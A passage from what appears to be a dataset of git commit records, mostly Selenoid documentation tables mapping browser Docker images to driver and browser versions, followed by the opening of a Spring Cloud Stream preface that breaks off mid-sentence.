selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .25+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n|===\n\nWARNING: Firefox 53.0+ images require Selenium client 3.4.0 or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 1.3.9 | 0.13.0 | 48.0.2 (page load timeout, native events and proxies don't work) .19+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 1.3.9 | 0.13.0 | 49.0.2 (page load timeout, native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 1.3.9 | 0.13.0 | 50.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 1.3.9 | 0.14.0 | 51.0.1 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 1.3.9 | 0.15.0 | 52.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.9 | 0.16.0 | 53.0.2 (switching windows may not work)\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.9 | 0.17.0 | 54.0.1 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.9 | 0.18.0 | 55.0.1 (switching 
windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.9 | 0.19.1 | 56.0.1 \n| selenoid\/firefox:57.0 | selenoid\/vnc:firefox_57.0 | 1.3.9 | 0.19.1 | 57.0 \n| selenoid\/firefox:58.0 | selenoid\/vnc:firefox_58.0 | 1.6.0 | 0.20.1 | 58.0\n| selenoid\/firefox:59.0 | selenoid\/vnc:firefox_59.0 | 1.6.0 | 0.20.1 | 59.0.1\n| selenoid\/firefox:60.0 | selenoid\/vnc:firefox_60.0 | 1.6.2 | 0.21.0 | 60.0.2\n| selenoid\/firefox:61.0 | selenoid\/vnc:firefox_61.0 | 1.6.2 | 0.21.0 | 61.0\n| selenoid\/firefox:62.0 | selenoid\/vnc:firefox_62.0 | 1.7.2 | 0.22.0 | 62.0\n| selenoid\/firefox:63.0 | selenoid\/vnc:firefox_63.0 | 1.8.1 | 0.23.0 | 63.0\n| selenoid\/firefox:64.0 | selenoid\/vnc:firefox_64.0 | 1.8.4 | 0.23.0 | 64.0\n| selenoid\/firefox:65.0 | selenoid\/vnc:firefox_65.0 | 1.9.0 | 0.24.0 | 65.0\n| selenoid\/firefox:66.0 | selenoid\/vnc:firefox_66.0 | 1.9.1 | 0.24.0 | 66.0.1\n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n| selenoid\/chrome:63.0 | selenoid\/vnc:chrome_63.0 | 2.33 | 63.0.3239.84\n| selenoid\/chrome:64.0 | selenoid\/vnc:chrome_64.0 | 2.35 | 64.0.3282.119\n| selenoid\/chrome:65.0 | selenoid\/vnc:chrome_65.0 | 2.38 | 65.0.3325.181\n| selenoid\/chrome:66.0 | selenoid\/vnc:chrome_66.0 | 2.38 | 66.0.3359.117\n| selenoid\/chrome:67.0 | selenoid\/vnc:chrome_67.0 | 2.39 | 67.0.3396.62\n| selenoid\/chrome:68.0 | selenoid\/vnc:chrome_68.0 | 2.41 | 68.0.3440.106\n| selenoid\/chrome:69.0 | selenoid\/vnc:chrome_69.0 | 2.42 | 69.0.3497.100\n| selenoid\/chrome:70.0 | selenoid\/vnc:chrome_70.0 | 2.44 | 70.0.3538.110\n| selenoid\/chrome:71.0 | selenoid\/vnc:chrome_71.0 | 2.44 | 71.0.3578.80\n| selenoid\/chrome:72.0 | selenoid\/vnc:chrome_72.0 | 2.46 | 72.0.3626.121\n| selenoid\/chrome:73.0 | selenoid\/vnc:chrome_73.0 | 73.0.3683.68 | 73.0.3683.75\n| selenoid\/chrome:74.0 | selenoid\/vnc:chrome_74.0 | 74.0.3729.6 | 74.0.3729.108\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. 
If you have such packages - we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to bug in *Operadriver* to work with *Opera Blink* images you need to pass additional capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. Many of base operations like working with proxies may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n| selenoid\/opera:49.0 | selenoid\/vnc:opera_49.0 | 2.32 | 49.0.2725.39\n| selenoid\/opera:50.0 | selenoid\/vnc:opera_50.0 | 2.32 | 50.0.2762.45\n| selenoid\/opera:51.0 | selenoid\/vnc:opera_51.0 | 2.33 | 51.0.2830.26\n| selenoid\/opera:52.0 | selenoid\/vnc:opera_52.0 | 2.35 | 52.0.2871.37\n| selenoid\/opera:53.0 | selenoid\/vnc:opera_53.0 | 2.36 | 53.0.2907.68\n| selenoid\/opera:54.0 | selenoid\/vnc:opera_54.0 | 2.37 | 54.0.2952.46\n| selenoid\/opera:55.0 | selenoid\/vnc:opera_55.0 | 2.37 | 55.0.2994.37\n| selenoid\/opera:56.0 | selenoid\/vnc:opera_56.0 | 2.40 | 56.0.3051.31\n| selenoid\/opera:57.0 | selenoid\/vnc:opera_57.0 | 2.41 | 57.0.3098.76\n| selenoid\/opera:58.0 | selenoid\/vnc:opera_58.0 | 2.42 | 58.0.3135.79\n| - | - | - | 59.0.x.x (no stable release exists)\n| selenoid\/opera:60.0 | selenoid\/vnc:opera_60.0 | 2.45 | 60.0.3255.56\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Android\n\nWARNING: Hardware server or virtual machine with nested virtualization support is required to run Android images.\n\n.Android Images\n|===\n| Image | Android version | Appium version\n\n| selenoid\/android:4.4 | 4.4 | 1.8.1 \n| selenoid\/android:5.1 | 5.1 | 1.8.1 \n| selenoid\/android:6.0 | 6.0 | 1.8.1 \n| selenoid\/android:7.0 | 7.0 | 1.8.1 \n| selenoid\/android:7.1 | 7.1 | 1.8.1 \n| selenoid\/android:8.0 | 8.0 | 1.8.1 \n| selenoid\/android:8.1 | 8.1 | 1.8.1 \n|===\n\n[NOTE]\n====\n. 
These images include VNC server and Android Quick Boot snapshot.\n. Neither Chromedriver nor Chrome Mobile are installed. To test hybrid apps build your own image using provided automation script.\n====\n","old_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .25+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | 
selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n|===\n\nWARNING: Firefox 53.0+ images require Selenium client 3.4.0 or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 1.3.9 | 0.13.0 | 48.0.2 (page load timeout, native events and proxies don't work) .19+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 1.3.9 | 0.13.0 | 49.0.2 (page load timeout, native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 1.3.9 | 0.13.0 | 50.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 1.3.9 | 0.14.0 | 51.0.1 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 1.3.9 | 0.15.0 | 52.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.9 | 0.16.0 | 53.0.2 (switching windows may not work)\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.9 | 0.17.0 | 54.0.1 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.9 | 0.18.0 | 55.0.1 (switching windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.9 | 0.19.1 | 56.0.1 \n| selenoid\/firefox:57.0 | selenoid\/vnc:firefox_57.0 | 1.3.9 | 0.19.1 | 57.0 \n| selenoid\/firefox:58.0 | selenoid\/vnc:firefox_58.0 | 1.6.0 | 0.20.1 | 58.0\n| selenoid\/firefox:59.0 | selenoid\/vnc:firefox_59.0 | 1.6.0 | 0.20.1 | 59.0.1\n| selenoid\/firefox:60.0 | selenoid\/vnc:firefox_60.0 | 1.6.2 | 0.21.0 | 60.0.2\n| selenoid\/firefox:61.0 | selenoid\/vnc:firefox_61.0 | 1.6.2 | 0.21.0 | 61.0\n| selenoid\/firefox:62.0 | selenoid\/vnc:firefox_62.0 | 1.7.2 | 0.22.0 | 62.0\n| selenoid\/firefox:63.0 | selenoid\/vnc:firefox_63.0 | 1.8.1 | 0.23.0 | 63.0\n| selenoid\/firefox:64.0 | selenoid\/vnc:firefox_64.0 | 1.8.4 | 0.23.0 | 64.0\n| selenoid\/firefox:65.0 | selenoid\/vnc:firefox_65.0 | 1.9.0 | 0.24.0 | 65.0\n| selenoid\/firefox:66.0 | selenoid\/vnc:firefox_66.0 | 1.9.1 | 0.24.0 | 66.0.1\n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | 
selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n| selenoid\/chrome:63.0 | selenoid\/vnc:chrome_63.0 | 2.33 | 63.0.3239.84\n| selenoid\/chrome:64.0 | selenoid\/vnc:chrome_64.0 | 2.35 | 64.0.3282.119\n| selenoid\/chrome:65.0 | selenoid\/vnc:chrome_65.0 | 2.38 | 65.0.3325.181\n| selenoid\/chrome:66.0 | selenoid\/vnc:chrome_66.0 | 2.38 | 66.0.3359.117\n| selenoid\/chrome:67.0 | selenoid\/vnc:chrome_67.0 | 2.39 | 67.0.3396.62\n| selenoid\/chrome:68.0 | selenoid\/vnc:chrome_68.0 | 2.41 | 68.0.3440.106\n| selenoid\/chrome:69.0 | selenoid\/vnc:chrome_69.0 | 2.42 | 69.0.3497.100\n| selenoid\/chrome:70.0 | selenoid\/vnc:chrome_70.0 | 2.44 | 70.0.3538.110\n| selenoid\/chrome:71.0 | selenoid\/vnc:chrome_71.0 | 2.44 | 71.0.3578.80\n| selenoid\/chrome:72.0 | selenoid\/vnc:chrome_72.0 | 2.46 | 72.0.3626.121\n| selenoid\/chrome:73.0 | selenoid\/vnc:chrome_73.0 | 73.0.3683.68 | 73.0.3683.75\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to bug in *Operadriver* to work with *Opera Blink* images you need to pass additional capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. 
Many of base operations like working with proxies may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n| selenoid\/opera:49.0 | selenoid\/vnc:opera_49.0 | 2.32 | 49.0.2725.39\n| selenoid\/opera:50.0 | selenoid\/vnc:opera_50.0 | 2.32 | 50.0.2762.45\n| selenoid\/opera:51.0 | selenoid\/vnc:opera_51.0 | 2.33 | 51.0.2830.26\n| selenoid\/opera:52.0 | selenoid\/vnc:opera_52.0 | 2.35 | 52.0.2871.37\n| selenoid\/opera:53.0 | selenoid\/vnc:opera_53.0 | 2.36 | 53.0.2907.68\n| selenoid\/opera:54.0 | selenoid\/vnc:opera_54.0 | 2.37 | 54.0.2952.46\n| selenoid\/opera:55.0 | selenoid\/vnc:opera_55.0 | 2.37 | 55.0.2994.37\n| selenoid\/opera:56.0 | selenoid\/vnc:opera_56.0 | 2.40 | 56.0.3051.31\n| selenoid\/opera:57.0 | selenoid\/vnc:opera_57.0 | 2.41 | 57.0.3098.76\n| selenoid\/opera:58.0 | selenoid\/vnc:opera_58.0 | 2.42 | 58.0.3135.79\n| - | - | - | 59.0.x.x (no stable release exists)\n| selenoid\/opera:60.0 | selenoid\/vnc:opera_60.0 | 2.45 | 60.0.3255.56\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Android\n\nWARNING: Hardware server or virtual machine with nested virtualization support is required to run Android images.\n\n.Android Images\n|===\n| Image | Android version | Appium version\n\n| selenoid\/android:4.4 | 4.4 | 1.8.1 \n| selenoid\/android:5.1 | 5.1 | 1.8.1 \n| selenoid\/android:6.0 | 6.0 | 1.8.1 \n| selenoid\/android:7.0 | 7.0 | 1.8.1 \n| selenoid\/android:7.1 | 7.1 | 1.8.1 \n| selenoid\/android:8.0 | 8.0 | 1.8.1 \n| selenoid\/android:8.1 | 8.1 | 1.8.1 \n|===\n\n[NOTE]\n====\n. These images include VNC server and Android Quick Boot snapshot.\n. Neither Chromedriver nor Chrome Mobile are installed. 
To test hybrid apps build your own image using provided automation script.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44f114e4e71992e2574cc79797e2b603aea9436e","subject":"Polishing docs","message":"Polishing docs\n","repos":"garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"docs\/src\/main\/asciidoc\/preface.adoc","new_file":"docs\/src\/main\/asciidoc\/preface.adoc","new_contents":"=== A Brief History of Spring's Data Integration Journey\n\nSpring's journey on Data Integration started with https:\/\/projects.spring.io\/spring-integration\/[Spring Integration]. With its programming model, it provided a consistent developer experience to build applications that can embrace http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] to connect with external systems such as databases and message brokers, among others.\n\nFast forward to the cloud-era, where microservices have become prominent in the enterprise setting. https:\/\/projects.spring.io\/spring-boot\/[Spring Boot] transformed the way developers build applications. With Spring's programming model and the runtime responsibilities handled by Spring Boot, it became seamless to develop stand-alone, production-grade Spring-based microservices.\n\nTo extend this to Data Integration workloads, Spring Integration and Spring Boot were put together into a new project. Spring Cloud Stream was born.\n\n[%hardbreaks]\nWith Spring Cloud Stream, developers can:\n* Build, test, iterate, and deploy data-centric applications in isolation.\n* Apply modern microservices architecture patterns, including composition through messaging.\n* Decouple application responsibilities with event-centric thinking. An event can represent something that has happened in time, to which the downstream consumer applications can react without knowing where it originated or the producer's identity.\n* Port the business logic onto message brokers (such as RabbitMQ, Apache Kafka, 